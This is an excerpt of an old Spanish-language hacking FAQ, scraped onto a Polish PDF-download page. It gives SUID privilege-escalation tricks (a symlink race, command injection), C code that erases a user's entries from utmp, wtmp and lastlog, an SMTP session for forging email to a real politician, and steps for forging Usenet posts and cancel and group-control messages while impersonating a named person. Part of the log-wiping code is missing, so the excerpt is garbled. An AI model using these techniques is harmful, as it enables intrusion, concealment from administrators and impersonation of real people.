[ Pobierz całość w formacie PDF ]
Ejemplo:
% ln suid.sh -i
% -i
#
3. Explote una condicion de raza
Reemplace un enlace simbólico al programa con otro programa mientras el
kernel carga /bin/sh.
Ejemplo:
nice -19 suidprog ; ln -s evilprog suidroot
4. Envíe una entrada mala al programa.
Invoque el nombre del programa y una orden separada en la misma
línea de orden.
Ejemplo:
suidprog ; id
13. ¿Cómo borro mi presencia de los logs (registros ) del sistema?
Mire /etc/utmp, /usr/adm/wtmp y /usr/adm/lastlog. Éstos no son archivos de texto
que se puedan revisar a mano con vi, debe usar un programa
específicamente escrito con este propósito.
Ejemplo:
#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
14. ¿Cómo envío falsos mails?
Telnet al puerto 25 de la máquina donde quieres que el correo apareaca para
generarlo. Ponga su mensaje como en este ejemplo:
HELO bellcore.com
MAIL FROM:voyager@bellcore.com
RCPT TO: jose_maria_Aznar@lamoncloa.gov
DATA
From: voyager@bellcore.com (The Voyager)
To: jose_maria_Aznar@lamoncloa.gov
Subject: Recortes
Reply-To: voyager@bellcore.com
Por favor interrumpa su tonta iniciativa de recortes.
.
QUIT
En sistemas que tengan RFC 931 implementado la linea "MAIL FROM:"
no funcionara. Pruebalo primero enviandote a ti mismo un mail falso.
Para mas informacion lea RFC 822 "Standard for the format of ARPA
Internet text messages"
15. ¿Cómo falsifico publicacion de articulos y mensajes de control en UseNet?
From: Anonymous (Pretending to be: tale@uunet.uu.net (David C Lawrence))
Subject: FAQ: Better living through forgery
Date: 19 Mar 1995 02:37:09 GMT
Noticias anónimas sin remailers "anónimos"
Inspirado por el reciente caso "NetNews Judges-L" este archivo ha sido
puesto al día para cubrir los mensajes de mando, así puede hacer su propio
cancelador de artículos y crear y destruir su newsgroups propio.
Guarde todos los artículos de las noticias a un archivo. Lo llamaremos "hak" en este
ejemplo.
Edite "hak", y quite cualquier linea en la cabecera de la forma
From some!random!path!user ( Fijese: "From ", no "From: " !!)
Article:
Lines:
Xref:
Acorte el Path : header a sus ULTIMOS dos o tres componentes "[bangized]"
. Ésto hara creer que el artículo fue publicado do where it really was posted, and
originally hit the net at or near the
host you send it to. O puede construir un path completamente nuevo:Una línea
para reflejar su supuesto alias.
Hacemos algunos cambios al campo Message-ID: , ése no está probablemente
duplicado en ningun mensaje .
Para este usualmente es mejor agregar un par de
carácteres del azar a la parte antes de el @, desde los pogramas de publicar noticias
generalmente usan un campo de longitud-fija para generar estos IDs.
Cambie los otros títulos que dicen como es usted como--From:, Newsgroups:,
Sender:, etc. Reemplaza el texto del mensaje original con su mensaje. Si
publica en un grupo moderado o anuncia un mensaje de control,
acuerdese de poner en un Approved: título para desviar el mecanismo de moderación.
Para cancelar específicamente algun artículo, necesitara su mensaje-ID.
Sus cabeceras del mensaje, además de lo qué esta ya allí, debe también
contener lo siguiente con este mensaje-ID en él. Ésto le hace un
"mensaje de control." NOTA: mensajes de control generalmente requieren un
header Approved: asi pues, debe agregar uno.
Subject: cmsg cancel
Control: cancel
Approved: luser@twits.site.com
Se crean y destrullen Newsgroups con mensajes de mando, tambien. Si
quiere crear, por ejemplo, comp.misc.microsoft.sucks, sus
headers( cabeceras ) de control se parecerían a
Subject: cmsg newgroup comp.misc.microsoft.sucks
Control: newgroup comp.misc.microsoft.sucks
Agrega la cadena "moderated" al final de estos si quieres que el grupo
sea "moderado sin moderador" como con alt.hackers. En alguna parte en
el cuerpo de su mensaje, debe incluir el texto siguiente,
cambiado con la descripción del grupo que usted crea:
For your newsgroups file:
comp.misc.microsoft.sucks We don't do windows
Para quitar un grupo, sustitulla rmgroup por newgroup en las líneas de cabecera.
Tenga presente que en la mayoría de sitios
todas las demandas rmgroup son puestas en marcha por una persona , el news-
master quien puede o no decidir honrarlo.
La creación del grupo es más probable que sea automática no como el borrado en la
mayoria de
instalaciones. Cualquier cambio en un newsgroup sera más probable que tenga efecto
si
viene de mí, puesto que mi nombre es (hardwired) en muchos control scripts del
NNTP
, así es recomendable usar las cabeceras From: y Approved: en éste
anuncio.
Guarde su articulo cambiado , reviselo para asegurarse que NO contiene ninguna
referencia a ti o a su propio site, y lo
envía a su servidor favorito NNTP que permite transferirlo via el comando IHAVE ,
usando el siguiente script:
=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server
if test "$2" = "" ; then
echo usage: $0 filename server
exit 1
fi
if test ! -f $1 ; then
echo $1: not found
exit 1
fi
[ Pobierz całość w formacie PDF ]
-
Archiwum
- Strona Główna
- Anonimo Historia Antigua. Proximo Oriente y Egipto
- Anonim Pieśń o Rolandzie (pdf)
- Anonim Zmysłowe sekrety
- Darcy, Emma Die Soehne der Kings 01 Nathan King, der Rinderbaron
- Castle Jayne Harmonia 01 Po zmroku
- Christie Corka jest corka
- (30) Niemirski Arkadiusz Pan Samochodzik i... Arsen Lupin tom 1
- Chmielewska Joanna Wszyscy jestesmy podejrzani
- Bloodcircle P. N. Elrod
- Hawksley_Elizabeth_ _zyrafy
- zanotowane.pl
- doc.pisz.pl
- pdf.pisz.pl
- filmowka.pev.pl